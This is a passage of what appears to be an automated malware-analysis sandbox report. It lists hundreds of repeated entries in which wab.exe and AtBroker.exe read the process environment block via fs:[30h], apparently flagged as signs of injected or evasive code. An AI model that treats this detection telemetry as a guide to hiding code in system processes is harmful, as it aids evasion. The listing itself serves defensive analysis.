        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A1329E mov eax, dword ptr fs:[00000030h]9_2_22A1329E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A1329E mov eax, dword ptr fs:[00000030h]9_2_22A1329E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A912ED mov eax, dword ptr fs:[00000030h]9_2_22A912ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A912ED mov eax, dword ptr fs:[00000030h]9_2_22A912ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A912ED mov eax, dword ptr fs:[00000030h]9_2_22A912ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A912ED mov eax, dword ptr fs:[00000030h]9_2_22A912ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A912ED mov eax, dword ptr fs:[00000030h]9_2_22A912ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A912ED mov eax, dword ptr fs:[00000030h]9_2_22A912ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A912ED mov eax, dword ptr fs:[00000030h]9_2_22A912ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A912ED mov eax, dword ptr fs:[00000030h]9_2_22A912ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A912ED mov eax, dword ptr fs:[00000030h]9_2_22A912ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A912ED mov eax, dword ptr fs:[00000030h]9_2_22A912ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A912ED mov eax, dword ptr fs:[00000030h]9_2_22A912ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A912ED mov eax, dword ptr fs:[00000030h]9_2_22A912ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A912ED mov eax, dword ptr fs:[00000030h]9_2_22A912ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A912ED mov eax, dword ptr fs:[00000030h]9_2_22A912ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22AB52E2 mov eax, dword ptr fs:[00000030h]9_2_22AB52E2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229DB2D3 mov eax, dword ptr fs:[00000030h]9_2_229DB2D3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229DB2D3 mov eax, dword ptr fs:[00000030h]9_2_229DB2D3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229DB2D3 mov eax, dword ptr fs:[00000030h]9_2_229DB2D3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A9F2F8 mov eax, dword ptr fs:[00000030h]9_2_22A9F2F8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229E92C5 mov eax, dword ptr fs:[00000030h]9_2_229E92C5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229E92C5 mov eax, dword ptr fs:[00000030h]9_2_229E92C5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229EA2C3 mov eax, dword ptr fs:[00000030h]9_2_229EA2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229EA2C3 mov eax, dword ptr fs:[00000030h]9_2_229EA2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229EA2C3 mov eax, dword ptr fs:[00000030h]9_2_229EA2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229EA2C3 mov eax, dword ptr fs:[00000030h]9_2_229EA2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229EA2C3 mov eax, dword ptr fs:[00000030h]9_2_229EA2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A0B2C0 mov eax, dword ptr fs:[00000030h]9_2_22A0B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A0B2C0 mov eax, dword ptr fs:[00000030h]9_2_22A0B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A0B2C0 mov eax, dword ptr fs:[00000030h]9_2_22A0B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A0B2C0 mov eax, dword ptr fs:[00000030h]9_2_22A0B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A0B2C0 mov eax, dword ptr fs:[00000030h]9_2_22A0B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A0B2C0 mov eax, dword ptr fs:[00000030h]9_2_22A0B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A0B2C0 mov eax, dword ptr fs:[00000030h]9_2_22A0B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229D92FF mov eax, dword ptr fs:[00000030h]9_2_229D92FF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A0F2D0 mov eax, dword ptr fs:[00000030h]9_2_22A0F2D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A0F2D0 mov eax, dword ptr fs:[00000030h]9_2_22A0F2D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229F02E1 mov eax, dword ptr fs:[00000030h]9_2_229F02E1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229F02E1 mov eax, dword ptr fs:[00000030h]9_2_229F02E1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229F02E1 mov eax, dword ptr fs:[00000030h]9_2_229F02E1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22AB5227 mov eax, dword ptr fs:[00000030h]9_2_22AB5227
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229D823B mov eax, dword ptr fs:[00000030h]9_2_229D823B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A17208 mov eax, dword ptr fs:[00000030h]9_2_22A17208
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A17208 mov eax, dword ptr fs:[00000030h]9_2_22A17208
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22AAD26B mov eax, dword ptr fs:[00000030h]9_2_22AAD26B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22AAD26B mov eax, dword ptr fs:[00000030h]9_2_22AAD26B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229E6259 mov eax, dword ptr fs:[00000030h]9_2_229E6259
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229DA250 mov eax, dword ptr fs:[00000030h]9_2_229DA250
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A21270 mov eax, dword ptr fs:[00000030h]9_2_22A21270
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A21270 mov eax, dword ptr fs:[00000030h]9_2_22A21270
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A09274 mov eax, dword ptr fs:[00000030h]9_2_22A09274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229D9240 mov eax, dword ptr fs:[00000030h]9_2_229D9240
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229D9240 mov eax, dword ptr fs:[00000030h]9_2_229D9240
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A90274 mov eax, dword ptr fs:[00000030h]9_2_22A90274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A90274 mov eax, dword ptr fs:[00000030h]9_2_22A90274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A90274 mov eax, dword ptr fs:[00000030h]9_2_22A90274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A90274 mov eax, dword ptr fs:[00000030h]9_2_22A90274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A90274 mov eax, dword ptr fs:[00000030h]9_2_22A90274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A90274 mov eax, dword ptr fs:[00000030h]9_2_22A90274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A90274 mov eax, dword ptr fs:[00000030h]9_2_22A90274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A90274 mov eax, dword ptr fs:[00000030h]9_2_22A90274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A90274 mov eax, dword ptr fs:[00000030h]9_2_22A90274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A90274 mov eax, dword ptr fs:[00000030h]9_2_22A90274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A90274 mov eax, dword ptr fs:[00000030h]9_2_22A90274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A90274 mov eax, dword ptr fs:[00000030h]9_2_22A90274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A1724D mov eax, dword ptr fs:[00000030h]9_2_22A1724D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229D826B mov eax, dword ptr fs:[00000030h]9_2_229D826B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229E4260 mov eax, dword ptr fs:[00000030h]9_2_229E4260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229E4260 mov eax, dword ptr fs:[00000030h]9_2_229E4260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229E4260 mov eax, dword ptr fs:[00000030h]9_2_229E4260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A9B256 mov eax, dword ptr fs:[00000030h]9_2_22A9B256
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A9B256 mov eax, dword ptr fs:[00000030h]9_2_22A9B256
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A133A0 mov eax, dword ptr fs:[00000030h]9_2_22A133A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A133A0 mov eax, dword ptr fs:[00000030h]9_2_22A133A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A033A5 mov eax, dword ptr fs:[00000030h]9_2_22A033A5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229D8397 mov eax, dword ptr fs:[00000030h]9_2_229D8397
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229D8397 mov eax, dword ptr fs:[00000030h]9_2_229D8397
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229D8397 mov eax, dword ptr fs:[00000030h]9_2_229D8397
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229DE388 mov eax, dword ptr fs:[00000030h]9_2_229DE388
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229DE388 mov eax, dword ptr fs:[00000030h]9_2_229DE388
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229DE388 mov eax, dword ptr fs:[00000030h]9_2_229DE388
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A0438F mov eax, dword ptr fs:[00000030h]9_2_22A0438F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A0438F mov eax, dword ptr fs:[00000030h]9_2_22A0438F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22AB539D mov eax, dword ptr fs:[00000030h]9_2_22AB539D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A9F3E6 mov eax, dword ptr fs:[00000030h]9_2_22A9F3E6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22AB53FC mov eax, dword ptr fs:[00000030h]9_2_22AB53FC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229EA3C0 mov eax, dword ptr fs:[00000030h]9_2_229EA3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229EA3C0 mov eax, dword ptr fs:[00000030h]9_2_229EA3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229EA3C0 mov eax, dword ptr fs:[00000030h]9_2_229EA3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229EA3C0 mov eax, dword ptr fs:[00000030h]9_2_229EA3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229EA3C0 mov eax, dword ptr fs:[00000030h]9_2_229EA3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229EA3C0 mov eax, dword ptr fs:[00000030h]9_2_229EA3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229E83C0 mov eax, dword ptr fs:[00000030h]9_2_229E83C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229E83C0 mov eax, dword ptr fs:[00000030h]9_2_229E83C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229E83C0 mov eax, dword ptr fs:[00000030h]9_2_229E83C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229E83C0 mov eax, dword ptr fs:[00000030h]9_2_229E83C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A163FF mov eax, dword ptr fs:[00000030h]9_2_22A163FF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A9C3CD mov eax, dword ptr fs:[00000030h]9_2_22A9C3CD
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229F03E9 mov eax, dword ptr fs:[00000030h]9_2_229F03E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229F03E9 mov eax, dword ptr fs:[00000030h]9_2_229F03E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229F03E9 mov eax, dword ptr fs:[00000030h]9_2_229F03E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229F03E9 mov eax, dword ptr fs:[00000030h]9_2_229F03E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229F03E9 mov eax, dword ptr fs:[00000030h]9_2_229F03E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229F03E9 mov eax, dword ptr fs:[00000030h]9_2_229F03E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229F03E9 mov eax, dword ptr fs:[00000030h]9_2_229F03E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229F03E9 mov eax, dword ptr fs:[00000030h]9_2_229F03E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A9B3D0 mov ecx, dword ptr fs:[00000030h]9_2_22A9B3D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22AA132D mov eax, dword ptr fs:[00000030h]9_2_22AA132D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22AA132D mov eax, dword ptr fs:[00000030h]9_2_22AA132D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A0F32A mov eax, dword ptr fs:[00000030h]9_2_22A0F32A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229DC310 mov ecx, dword ptr fs:[00000030h]9_2_229DC310
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A1A30B mov eax, dword ptr fs:[00000030h]9_2_22A1A30B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A1A30B mov eax, dword ptr fs:[00000030h]9_2_22A1A30B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A1A30B mov eax, dword ptr fs:[00000030h]9_2_22A1A30B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229D7330 mov eax, dword ptr fs:[00000030h]9_2_229D7330
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451645D mov eax, dword ptr fs:[00000030h]11_2_0451645D
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454245A mov eax, dword ptr fs:[00000030h]11_2_0454245A
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455E443 mov eax, dword ptr fs:[00000030h]11_2_0455E443
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455E443 mov eax, dword ptr fs:[00000030h]11_2_0455E443
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455E443 mov eax, dword ptr fs:[00000030h]11_2_0455E443
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455E443 mov eax, dword ptr fs:[00000030h]11_2_0455E443
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455E443 mov eax, dword ptr fs:[00000030h]11_2_0455E443
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455E443 mov eax, dword ptr fs:[00000030h]11_2_0455E443
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455E443 mov eax, dword ptr fs:[00000030h]11_2_0455E443
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455E443 mov eax, dword ptr fs:[00000030h]11_2_0455E443
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454A470 mov eax, dword ptr fs:[00000030h]11_2_0454A470
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454A470 mov eax, dword ptr fs:[00000030h]11_2_0454A470
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454A470 mov eax, dword ptr fs:[00000030h]11_2_0454A470
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045AC460 mov ecx, dword ptr fs:[00000030h]11_2_045AC460
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04558402 mov eax, dword ptr fs:[00000030h]11_2_04558402
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04558402 mov eax, dword ptr fs:[00000030h]11_2_04558402
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04558402 mov eax, dword ptr fs:[00000030h]11_2_04558402
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451E420 mov eax, dword ptr fs:[00000030h]11_2_0451E420
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451E420 mov eax, dword ptr fs:[00000030h]11_2_0451E420
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451E420 mov eax, dword ptr fs:[00000030h]11_2_0451E420
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451C427 mov eax, dword ptr fs:[00000030h]11_2_0451C427
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A6420 mov eax, dword ptr fs:[00000030h]11_2_045A6420
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A6420 mov eax, dword ptr fs:[00000030h]11_2_045A6420
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A6420 mov eax, dword ptr fs:[00000030h]11_2_045A6420
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A6420 mov eax, dword ptr fs:[00000030h]11_2_045A6420
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A6420 mov eax, dword ptr fs:[00000030h]11_2_045A6420
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A6420 mov eax, dword ptr fs:[00000030h]11_2_045A6420
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A6420 mov eax, dword ptr fs:[00000030h]11_2_045A6420
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045204E5 mov ecx, dword ptr fs:[00000030h]11_2_045204E5
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045544B0 mov ecx, dword ptr fs:[00000030h]11_2_045544B0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045AA4B0 mov eax, dword ptr fs:[00000030h]11_2_045AA4B0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045264AB mov eax, dword ptr fs:[00000030h]11_2_045264AB
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04528550 mov eax, dword ptr fs:[00000030h]11_2_04528550
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04528550 mov eax, dword ptr fs:[00000030h]11_2_04528550
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455656A mov eax, dword ptr fs:[00000030h]11_2_0455656A
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455656A mov eax, dword ptr fs:[00000030h]11_2_0455656A
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455656A mov eax, dword ptr fs:[00000030h]11_2_0455656A
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045B6500 mov eax, dword ptr fs:[00000030h]11_2_045B6500
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045F4500 mov eax, dword ptr fs:[00000030h]11_2_045F4500
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045F4500 mov eax, dword ptr fs:[00000030h]11_2_045F4500
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045F4500 mov eax, dword ptr fs:[00000030h]11_2_045F4500
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045F4500 mov eax, dword ptr fs:[00000030h]11_2_045F4500
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045F4500 mov eax, dword ptr fs:[00000030h]11_2_045F4500
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045F4500 mov eax, dword ptr fs:[00000030h]11_2_045F4500
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045F4500 mov eax, dword ptr fs:[00000030h]11_2_045F4500
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530535 mov eax, dword ptr fs:[00000030h]11_2_04530535
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530535 mov eax, dword ptr fs:[00000030h]11_2_04530535
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530535 mov eax, dword ptr fs:[00000030h]11_2_04530535
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530535 mov eax, dword ptr fs:[00000030h]11_2_04530535
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530535 mov eax, dword ptr fs:[00000030h]11_2_04530535
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530535 mov eax, dword ptr fs:[00000030h]11_2_04530535
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454E53E mov eax, dword ptr fs:[00000030h]11_2_0454E53E
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454E53E mov eax, dword ptr fs:[00000030h]11_2_0454E53E
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454E53E mov eax, dword ptr fs:[00000030h]11_2_0454E53E
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454E53E mov eax, dword ptr fs:[00000030h]11_2_0454E53E
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454E53E mov eax, dword ptr fs:[00000030h]11_2_0454E53E
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045265D0 mov eax, dword ptr fs:[00000030h]11_2_045265D0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455A5D0 mov eax, dword ptr fs:[00000030h]11_2_0455A5D0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455A5D0 mov eax, dword ptr fs:[00000030h]11_2_0455A5D0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455E5CF mov eax, dword ptr fs:[00000030h]11_2_0455E5CF
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455E5CF mov eax, dword ptr fs:[00000030h]11_2_0455E5CF
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045225E0 mov eax, dword ptr fs:[00000030h]11_2_045225E0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454E5E7 mov eax, dword ptr fs:[00000030h]11_2_0454E5E7
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454E5E7 mov eax, dword ptr fs:[00000030h]11_2_0454E5E7
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454E5E7 mov eax, dword ptr fs:[00000030h]11_2_0454E5E7
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454E5E7 mov eax, dword ptr fs:[00000030h]11_2_0454E5E7
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454E5E7 mov eax, dword ptr fs:[00000030h]11_2_0454E5E7
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454E5E7 mov eax, dword ptr fs:[00000030h]11_2_0454E5E7
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454E5E7 mov eax, dword ptr fs:[00000030h]11_2_0454E5E7
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454E5E7 mov eax, dword ptr fs:[00000030h]11_2_0454E5E7
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455C5ED mov eax, dword ptr fs:[00000030h]11_2_0455C5ED
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455C5ED mov eax, dword ptr fs:[00000030h]11_2_0455C5ED
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455E59C mov eax, dword ptr fs:[00000030h]11_2_0455E59C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04522582 mov eax, dword ptr fs:[00000030h]11_2_04522582
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04522582 mov ecx, dword ptr fs:[00000030h]11_2_04522582
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04554588 mov eax, dword ptr fs:[00000030h]11_2_04554588
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045445B1 mov eax, dword ptr fs:[00000030h]11_2_045445B1
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045445B1 mov eax, dword ptr fs:[00000030h]11_2_045445B1
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A05A7 mov eax, dword ptr fs:[00000030h]11_2_045A05A7
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A05A7 mov eax, dword ptr fs:[00000030h]11_2_045A05A7
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A05A7 mov eax, dword ptr fs:[00000030h]11_2_045A05A7
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453C640 mov eax, dword ptr fs:[00000030h]11_2_0453C640
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04552674 mov eax, dword ptr fs:[00000030h]11_2_04552674
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045E866E mov eax, dword ptr fs:[00000030h]11_2_045E866E
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045E866E mov eax, dword ptr fs:[00000030h]11_2_045E866E
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455A660 mov eax, dword ptr fs:[00000030h]11_2_0455A660
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455A660 mov eax, dword ptr fs:[00000030h]11_2_0455A660
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562619 mov eax, dword ptr fs:[00000030h]11_2_04562619
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0459E609 mov eax, dword ptr fs:[00000030h]11_2_0459E609
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453260B mov eax, dword ptr fs:[00000030h]11_2_0453260B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453260B mov eax, dword ptr fs:[00000030h]11_2_0453260B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453260B mov eax, dword ptr fs:[00000030h]11_2_0453260B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453260B mov eax, dword ptr fs:[00000030h]11_2_0453260B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453260B mov eax, dword ptr fs:[00000030h]11_2_0453260B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453260B mov eax, dword ptr fs:[00000030h]11_2_0453260B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453260B mov eax, dword ptr fs:[00000030h]11_2_0453260B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453E627 mov eax, dword ptr fs:[00000030h]11_2_0453E627
